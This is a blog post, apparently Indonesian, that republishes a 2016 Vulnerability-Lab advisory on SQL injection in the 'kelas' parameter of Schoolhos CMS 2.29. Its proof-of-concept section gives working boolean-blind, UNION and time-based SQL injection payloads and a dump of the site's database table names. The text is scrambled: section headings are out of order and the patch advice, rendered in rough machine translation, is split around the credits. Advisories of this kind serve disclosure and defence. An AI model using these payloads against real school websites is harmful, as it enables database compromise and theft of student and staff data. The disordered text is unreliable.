Schoolhos CMS 2.29 - 'kelas' Parameter SQL Injection
Holaaaaa, selamat malam kawan RZLabs. Pada malam hari ini saya akan berbagi sebuah info tentang exploit sebuah cms sekolah yaitu
Schoolhos CMS 2.29 vulnerability teradapt SQL Injection, sperti apa exploitnya simak artike ini.Info:Technical Detail and Description:
Doc Title: Schoolhos CMS v2.29 - SQL Injection Vulnerability
Exploit Type: SQL Injection Vulnerability
Exploitation Technique: Remote
Severity Level: High
Author: Vulnerability-Lab
Release Date: 2016-11-07
Vendor Homepage: Schoolhos
Lates CMS Download: CMS Schoolhos Download
Vuln CMS Download: Vulnerable App
A remote sql injection web vulnerability has been discovered in the official Schoolhos v2_29 content management system.The web vulnerability allows remote attackers to execute own malicious sql commands to compromise the application or dbms.The sql injection vulnerability is located in the `kelas` parameter of the `index?p=siswakelas module POST method request.Remote attackers are able to execute own sql commands by usage of an insecure post method request through the vulnerableparameter of the own application. The attack vector of the vulnerability is application-side and the request method toinject is POST. The security vulnerability in the content management system is a classic select remote sql-injection.The security risk of the vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.7.Exploitation of the remote sql injection vulnerability requires no user interaction or privileged web-application user account.Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.
Proof of Concept ( PoC ):
Request Method(s):[+] POSTVulnerable Module(s):[+] ./SCRIPTPATH/index.php?p=siswakelasVulnerable Parameter(s):[+] kelas
Remote sql-injection kerentanan web dapat dimanfaatkan oleh penyerang jarak jauh tanpa web-aplikasi akun pengguna istimewa dan tanpa interaksi pengguna.
Untuk demonstrasi keamanan atau untuk mereproduksi sql-injection kerentanan web mengikuti informasi yang diberikan dan langkah-langkah di bawah ini untuk melanjutkan.
Solution - Fix and Patch:PoC Session Logs:[+] Place: POST > Parameter: kelasType: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: kelas=1' AND 4945=4945 AND 'SfWY'='SfWYType: UNION queryTitle: MySQL UNION query (NULL) - 3 columnsPayload: kelas=-2062' UNION ALL SELECT NULL,CONCAT(0x71736b6271,0x43746d4846536767524d,0x716b6d6171),NULL#Type: AND/OR time-based blindTitle: MySQL > 5.0.11 AND time-based blindPayload: kelas=1' AND SLEEP(5) AND 'Wqrd'='Wqrd---[21 tables]+-----------------+| sh_agenda || sh_album || sh_berita || sh_buku_tamu || sh_galeri || sh_guru_staff || sh_info_sekolah || sh_jabatan || sh_kategori || sh_kelas || sh_komentar || sh_mapel || sh_materi || sh_pengaturan || sh_pengumuman || sh_psb || sh_sidebar || sh_siswa || sh_statistik || sh_tema || sh_users |+-----------------+
Kerentanan sql-injection di `parameter kelas` dari` permintaan metode file POST index.php` dapat ditambal oleh penggunaan yang amanCredits and Authors:
Pernyataan siap. Mengurai parameter dan mengkodekan nilai-nilai ke format aman untuk mencegah lebih lanjut
serangan sql-injection. Melarikan diri parameter dan melarang penggunaan karakter khusus.
Vulnerability Laboratory [Research Team] - Lawrence Amer (www.vulnerability-lab.com/show.php?user=Lawrence Amer)Disclaimer and Information:
Domains: Vulnerability Lab - Vuln Lab - EvolutionReferences [Source]:
Section: Magazine - Vuln lab Contact - Evolution Contact
Social: Twitter Vuln Lab - Facebook Vuln Lab
Feeds: Vuln Lab RSS - UP Coming - News
Vuln Lab ArtikelSekian dari artikel yang saya tulis. Mohon maaf jika ada kekurangnnya ya kawan. Semoga bermanfaat ^_^. Jangan lupa like dan share post ini ya ^_^.
Exploit DB
